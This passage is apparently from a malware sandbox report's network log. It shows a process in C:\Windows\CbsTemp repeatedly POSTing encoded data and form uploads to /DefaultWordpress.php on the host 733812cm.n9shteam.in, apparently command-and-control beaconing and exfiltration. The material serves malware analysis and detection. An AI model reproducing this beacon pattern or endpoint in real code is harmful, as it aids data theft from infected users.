                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NLwCorUAinjxlpuY35P0%2FEAxnU9Czmw64S6kiF1AXZr8G01x%2Bg0MhG96CuPy9%2By2E2H6UhEirFdXJ4AeGVomWLDZW9rgYo3%2Bw82pwuATYSGQffP4PUZKP41q9qy4tIP9B6XWWgnhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52a0eff4cf4d-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11741&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2827&delivery_rate=116025&cwnd=54&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.5 | 49866 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:16.644735098 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:17.004992962 CEST | 2528 | OUT | Data Raw: 5b 5b 5c 52 5f 5a 54 51 54 5b 52 57 50 5e 57 52 50 5f 5d 56 50 54 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\R_ZTQT[RWP^WRP_]VPTWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )3&%8=R+''+.?.)< Z3=[&2+3&3+*#F $P.4
                                                          Oct 20, 2024 18:18:17.459938049 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:17.830497026 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:17 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlSS%2F5Ztg%2BbIpPPdKqJXfHKDzTfIdLzi%2B4YBslWxeO743FZGTMIq08Rt7uT1shmNs416R%2FhAGHnzkUbzVJj5dkoBnqE2TwEEFEvkLzRnQliJhR6dry238MyvUwpOwJNk3yQowX2%2F%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52aa999dfa52-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11181&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=129251&cwnd=87&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.5 | 49869 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:17.141603947 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:17.495001078 CEST | 1948 | OUT | Data Raw: 5b 5e 59 5c 5a 5b 54 51 54 5b 52 57 50 53 57 50 50 58 5d 5e 50 54 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^Y\Z[TQT[RWPSWPPX]^PTWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(#9X$+<80(=<=,8Y08200-$:]<*#F $P.
                                                          Oct 20, 2024 18:18:19.197911978 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:19.430666924 CEST | 943 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jc4Jc%2BBO1iCqirt2yIA1hXjS2esyyhniPSia7vgetUU6OsBuqjpV1F4iBK6jS%2BwP%2FX0Tgz%2B6c8PW1DVNARN6zfjNtAHe1wmspWCVbuwJIn82o%2BgF%2BwypCiTgK4Kl0LVL9CYhyL4kgg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52b5780196b1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13081&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=102014&cwnd=165&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 30 06 30 09 29 3f 3b 0a 2e 07 2a 0d 2e 03 02 03 3a 1f 36 05 24 33 2d 01 27 3a 03 11 31 0d 2b 58 23 3c 31 02 20 59 3d 1d 3a 1c 28 5e 07 12 26 13 3f 12 3c 16 3e 3d 06 14 28 06 01 00 22 0e 2f 06 27 3e 2f 56 33 03 36 01 2a 0f 31 10 3e 03 03 09 39 1a 0b 0a 2d 2b 23 00 37 00 22 53 03 13 25 58 3d 09 20 59 36 22 23 13 2b 13 37 5b 2b 38 3a 5a 2a 23 27 1f 2b 28 09 1d 2c 5b 32 59 30 3f 3f 03 26 3f 2f 00 32 2a 23 19 24 2a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%00)?;.*.:6$3-':1+X#<1 Y=:(^&?<>=("/'>/V36*1>9-+#7"S%X= Y6"#+7[+8:Z*#'+(,[2Y0??&?/2*#$*$^-/W6[O0
                                                          Oct 20, 2024 18:18:19.439564943 CEST | 286 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 532
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:19.791896105 CEST | 532 | OUT | Data Raw: 5e 5a 5c 5e 5f 58 54 57 54 5b 52 57 50 5a 57 55 50 58 5d 5f 50 56 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^Z\^_XTWT[RWPZWUPX]_PVW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=1X2]%?$^-<*,<\0/1! %;&X$-*_+:#F $P.
                                                          Oct 20, 2024 18:18:20.453161001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:20.675885916 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GPJ%2FIYhUmg78%2FV0KQDZaml5v3ago7WaUAIoOPW5502UuCclp2yjAITJoAEY1CL38NtPvh7VCWNrC6NH52RFCa4B43OnYQ1wwKpxYN52Bf1cKq%2Fh2WuXktGkskag%2FrgXox1FSTJbmfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52bd4e1596b1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13022&sent=5&recv=9&lost=0&retrans=0&sent_bytes=993&recv_bytes=3077&delivery_rate=224165&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:20.676363945 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----OBAJkATLExqqd3jrm1ca4QICBXNQGpX11R
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 3006
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:20.855206013 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:20.855400085 CEST | 3006 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4f 42 41 4a 6b 41 54 4c 45 78 71 71 64 33 6a 72 6d 31 63 61 34 51 49 43 42 58 4e 51 47 70 58 31 31 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------OBAJkATLExqqd3jrm1ca4QICBXNQGpX11RContent-Disposition: form-data; name="0"Content-Type: text/plain[_\RZYQQT[RWPZW\P_]WPRWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:21.469187021 CEST | 794 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WF81D9dR9mpCbNVTSYDsGWBRHPaUdvKw%2BahoCVw0njCAUywgkMIxVEhWpPM4%2FKxFYDSif3GKWW6DSM7gfYYOxMibjJNMdMk%2Bc0IVKyvSu2zkh5AR3%2BEpEKML7sLWyq2XQB9GzfGw0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52bfc8d096b1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13152&sent=10&recv=17&lost=0&retrans=0&sent_bytes=1809&recv_bytes=6405&delivery_rate=224165&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.5 | 49874 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:17.959599018 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:18.308712959 CEST | 2528 | OUT | Data Raw: 5e 5d 5c 53 5f 5f 54 55 54 5b 52 57 50 59 57 5d 50 5d 5d 5c 50 50 57 58 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]\S__TUT[RWPYW]P]]\PPWX\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)0-%T>3;'^%T=-([*/,\'>3X2Z$(1'.)+*#F $P.(
                                                          Oct 20, 2024 18:18:18.736522913 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:19.101535082 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:19 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r8L3AMhSXyFhiW0%2FjKAFEZvVekql5DpPddiF%2FGLXb8U6JbzOKtM3l5tx7AlvJlYdVBVCkCtEQ%2FG0o%2BwXhTHvDBWm1mojdXxwAGkWMSXjGh69Gc57jJfcXuNuno%2FQDsvpT9Cslg4Trw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52b29c7ccf82-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11280&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=129204&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.5 | 49880 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:19.234040022 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:19.588831902 CEST | 2528 | OUT | Data Raw: 5b 59 5c 5c 5f 5d 54 52 54 5b 52 57 50 53 57 51 50 51 5d 5e 50 53 57 5f 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Y\\_]TRT[RWPSWQPQ]^PSW_\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ )3^2<3'Z&8!(-;(/$$=?1"7$(&]'+:#F $P.
                                                          Oct 20, 2024 18:18:20.037831068 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:20.303100109 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:20 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRUt0fAAmYQhXcftWC5BVc%2BWIgZxeLU3H0PZTuO215nw5yiu5utnQu2TjZmDZHoeE2iv06DXoDDjGmzeuYDGCNIjYVg1wZKdtRBL%2B11ErDuyWt2VoUI7%2Ft0F%2FFKWOfwYb2bS%2BpCnLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52babe94faaa-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11267&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=128940&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          21 | 192.168.2.5 | 49886 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:20.488634109 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:20.838932037 CEST | 2528 | OUT | Data Raw: 5e 58 59 58 5a 53 54 52 54 5b 52 57 50 52 57 5d 50 5d 5d 57 50 52 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^XYXZSTRT[RWPRW]P]]WPRWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ Y( !Z1!? $$8==8\)40'$"+Z';2]3=9?:#F $P.
                                                          Oct 20, 2024 18:18:21.265302896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:21.635499001 CEST | 788 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:21 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwzEXHTTqzrjoitJ8D46A6xUO25sy9c2sgnptuuW6eEddqCFxmw6MDqxqeMnL3l9DhyxB2D8g4MS0m6s%2F3hGCi1OaRsPpS8ZIG%2F74gz59sKxEDBGLA%2F8vfpHqHkuVylkzNIBxU9apg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52c25bc71748-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12109&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=121568&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          22 | 192.168.2.5 | 49891 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:21.870031118 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:22.230448008 CEST | 2528 | OUT | Data Raw: 5b 5b 5c 5e 5f 5a 51 50 54 5b 52 57 50 5e 57 57 50 59 5d 5b 50 51 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\^_ZQPT[RWP^WWPY][PQW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ * .%+*<3'1U(>=/$3=/X$14$(>]0>.\(#F $P.4
                                                          Oct 20, 2024 18:18:22.689568043 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:23.059432983 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:22 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rs4dZlw%2B7iKyou4%2BYN3FPmZrF18LyLSjQleb3waphMzCZ4akQUsFXHYla%2Bct%2B4Mklrwg5SF059AG6HqFX%2BZajaj4WtPOeeFJ8yOHAwasJ4L3kPDU%2BrtsQHtpDnER42kkrIsjgkwQGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52cb4e3467eb-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11255&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=119817&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          23 | 192.168.2.5 | 49897 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:23.186777115 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:23.541804075 CEST | 2528 | OUT | Data Raw: 5e 5c 5c 53 5a 5d 51 5d 54 5b 52 57 50 59 57 50 50 58 5d 5c 50 50 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^\\SZ]Q]T[RWPYWPPX]\PPW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#(#:%=+#;3()(=?8\&-+_%143.Y'"\?#F $P.(
                                                          Oct 20, 2024 18:18:24.479649067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:24.843765974 CEST | 794 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:24 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2mz8fiuYkh0MmmczYJUAmAsm1BddA%2F4SdVtkJLH0R0%2FD%2BZbMc1xvUqNb%2B6UZFJGl8%2BhVRndVb1QNeGGC5LMhmrdD%2FEAdR2C8Sdx54ibTMrPrtbJtmkThLjhNTjeFaJh3ufSGJouSrw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52d67d4915ba-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11598&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=124655&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          24 | 192.168.2.5 | 49903 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:24.454138041 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
